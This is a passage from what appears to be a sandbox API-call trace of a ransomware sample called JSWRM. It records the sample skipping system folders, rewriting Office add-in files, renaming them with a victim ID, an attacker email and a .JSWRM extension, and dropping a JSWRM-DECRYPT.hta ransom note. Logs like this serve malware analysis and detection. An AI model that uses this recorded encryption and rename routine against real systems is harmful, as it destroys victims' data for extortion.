dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", cchWideChar=60, lpMultiByteStr=0x20d698, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdHoc.Excel.Client.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.129] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4caf7cd, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4caf7cd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4caf7cd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4918, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0124.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2=".") returned 1 [0124.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="..") returned 1 [0124.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="...") returned 1 [0124.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="windows") returned -1 [0124.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="recovery") returned -1 [0124.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="perflogs") returned -1 [0124.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="documents and settings") returned 1 [0124.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="system volume information") returned -1 [0124.129] lstrcmpiW (lpString1="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpString2="msocache") returned -1 [0124.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dba8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 60 [0124.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", cchWideChar=60, lpMultiByteStr=0x20dde8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.ReportingServices.AdomdDataExtension.resources.dll", lpUsedDefaultChar=0x0) returned 60 [0124.130] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x13aced2b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x13aced2b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13b67741, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f09b, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.gl.xap", cAlternateFileName="POWERV~1.XAP")) returned 1 [0124.130] lstrcmpiW (lpString1="PowerViewRes.gl.xap", lpString2=".") returned 1 [0124.130] lstrcmpiW (lpString1="PowerViewRes.gl.xap", lpString2="..") returned 1 [0124.130] lstrcmpiW (lpString1="PowerViewRes.gl.xap", lpString2="...") returned 1 [0124.130] lstrcmpiW (lpString1="PowerViewRes.gl.xap", lpString2="windows") returned -1 [0124.130] lstrcmpiW (lpString1="PowerViewRes.gl.xap", lpString2="recovery") returned -1 [0124.130] lstrcmpiW (lpString1="PowerViewRes.gl.xap", lpString2="perflogs") returned 1 [0124.130] lstrcmpiW (lpString1="PowerViewRes.gl.xap", lpString2="documents and settings") returned 1 [0124.130] lstrcmpiW (lpString1="PowerViewRes.gl.xap", lpString2="$RECYCLE.BIN") returned 1 [0124.130] lstrcmpiW (lpString1="PowerViewRes.gl.xap", lpString2="system volume information") returned -1 [0124.130] lstrcmpiW (lpString1="PowerViewRes.gl.xap", lpString2="msocache") returned 1 [0124.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.gl.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.gl.xap", cchWideChar=19, lpMultiByteStr=0x2411c8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.gl.xap", lpUsedDefaultChar=0x0) returned 19 [0124.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.gl.xap", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0124.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PowerViewRes.gl.xap", cchWideChar=19, lpMultiByteStr=0x241128, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PowerViewRes.gl.xap", lpUsedDefaultChar=0x0) returned 19 [0124.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.130] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e22c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.130] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\gl\\PowerViewRes.gl.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\gl\\powerviewres.gl.xap"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0124.132] GetFileSizeEx (in: hFile=0x338, lpFileSize=0x345e1c0 | out: lpFileSize=0x345e1c0*=323739) returned 1 [0124.132] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.132] ReadFile (in: hFile=0x338, lpBuffer=0x24f1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e1cc, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesRead=0x345e1cc*=0x27100, lpOverlapped=0x0) returned 1 [0124.146] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.146] WriteFile (in: hFile=0x338, lpBuffer=0x24f1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e1c8, lpOverlapped=0x0 | out: lpBuffer=0x24f1e0*, lpNumberOfBytesWritten=0x345e1c8*=0x27100, lpOverlapped=0x0) returned 1 [0124.147] CloseHandle (hObject=0x338) returned 1 [0124.147] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\gl\\PowerViewRes.gl.xap" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\gl\\powerviewres.gl.xap"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\gl\\PowerViewRes.gl.xap.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\gl\\powerviewres.gl.xap.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0124.148] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x13aced2b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x13aced2b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13b67741, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4f09b, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="PowerViewRes.gl.xap", cAlternateFileName="POWERV~1.XAP")) returned 0 [0124.148] FindClose (in: hFindFile=0x231c00 | out: hFindFile=0x231c00) returned 1 [0124.149] FindNextFileW (in: hFindFile=0x231e00, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4a98712, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13a8299e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x13a8299e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xf1550, dwReserved1=0x0, cFileName="he", cAlternateFileName="")) returned 1 [0124.149] lstrcmpiW (lpString1="he", lpString2=".") returned 1 [0124.149] lstrcmpiW (lpString1="he", lpString2="..") returned 1 [0124.149] lstrcmpiW (lpString1="he", lpString2="...") returned 1 [0124.149] lstrcmpiW (lpString1="he", lpString2="windows") returned -1 [0124.149] lstrcmpiW (lpString1="he", lpString2="recovery") returned -1 [0124.149] lstrcmpiW (lpString1="he", lpString2="perflogs") returned -1 [0124.149] lstrcmpiW (lpString1="he", lpString2="documents and settings") returned 1 [0124.149] lstrcmpiW (lpString1="he", lpString2="$RECYCLE.BIN") returned 1 [0124.149] lstrcmpiW (lpString1="he", lpString2="system volume information") returned -1 [0124.149] lstrcmpiW (lpString1="he", lpString2="msocache") returned -1 [0124.149] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\he\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\he\\jswrm-decrypt.hta")) returned 0xffffffff [0124.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0124.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b424, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0124.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0124.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24e1d8 [0124.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0124.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24ffa8 [0124.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1d8 | out: hHeap=0x1e0000) returned 1 [0124.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236690 [0124.151] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e7a0 [0124.151] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236690 | out: hHeap=0x1e0000) returned 1 [0124.151] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\he\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\he\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0124.152] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0124.152] WriteFile (in: hFile=0x314, lpBuffer=0x345b538*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b504, lpOverlapped=0x0 | out: lpBuffer=0x345b538*, lpNumberOfBytesWritten=0x345b504*=0x230c, lpOverlapped=0x0) returned 1 [0124.153] CloseHandle (hObject=0x314) returned 1 [0124.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e7a0 | out: hHeap=0x1e0000) returned 1 [0124.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24ffa8 | out: hHeap=0x1e0000) returned 1 [0124.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0124.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0124.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0124.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0124.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0124.153] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e458 [0124.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0124.153] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\he\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\power view excel add-in\\he\\jswrm-decrypt.hta")) returned 0x20 [0124.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e458 | out: hHeap=0x1e0000) returned 1 [0124.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0124.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2360d0 [0124.154] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Power View Excel Add-in\\he\\*.*", lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4a98712, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13a8299e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40a88928, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName=".", cAlternateFileName="")) returned 0x231b00 [0124.154] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0124.154] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf4a98712, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x13a8299e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x40a88928, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="..", cAlternateFileName="")) returned 1 [0124.154] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0124.154] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0124.154] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf6c6bda4, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf6c6bda4, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x13bb3be0, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xc3440, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="AdHocReportingExcelClient.dll", cAlternateFileName="ADHOCR~1.DLL")) returned 1 [0124.154] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2=".") returned 1 [0124.154] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="..") returned 1 [0124.154] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="...") returned 1 [0124.154] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="windows") returned -1 [0124.154] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="recovery") returned -1 [0124.154] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="perflogs") returned -1 [0124.154] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="documents and settings") returned -1 [0124.154] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.154] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="system volume information") returned -1 [0124.154] lstrcmpiW (lpString1="AdHocReportingExcelClient.dll", lpString2="msocache") returned -1 [0124.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dba8 [0124.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0124.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x241330, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dba8 | out: hHeap=0x1e0000) returned 1 [0124.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0124.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 29 [0124.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0124.161] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="AdHocReportingExcelClient.dll", cchWideChar=29, lpMultiByteStr=0x240ef8, cbMultiByte=29, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="AdHocReportingExcelClient.dll", lpUsedDefaultChar=0x0) returned 29 [0124.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0124.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0124.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2360d0 | out: hHeap=0x1e0000) returned 1 [0124.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0124.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0124.162] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x40a88928, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x40a88928, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x40a88928, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0124.162] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0124.162] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0124.162] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0124.162] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0124.162] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0124.162] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0124.162] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0124.162] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0124.162] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0124.162] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0124.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0124.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0124.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241178, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0124.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0124.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0124.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0124.162] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241330, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0124.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0124.162] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0124.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0124.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0124.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0124.162] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6bae279, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6bae279, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6bd443f, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13aa8, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="Microsoft.PowerBI.Diagnostics.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0124.162] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2=".") returned 1 [0124.162] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="..") returned 1 [0124.162] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="...") returned 1 [0124.162] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="windows") returned -1 [0124.162] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="recovery") returned -1 [0124.163] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="perflogs") returned -1 [0124.163] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="documents and settings") returned 1 [0124.163] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0124.163] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="system volume information") returned -1 [0124.163] lstrcmpiW (lpString1="Microsoft.PowerBI.Diagnostics.resources.dll", lpString2="msocache") returned -1 [0124.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0124.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0124.163] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0124.163] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.PowerBI.Diagnostics.resources.dll", cchWideChar=43, lpMultiByteStr=0x22cdc8, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.PowerBI.Diagnostics.resources.dll", lpUsedDefaultChar=0x0) returned 43 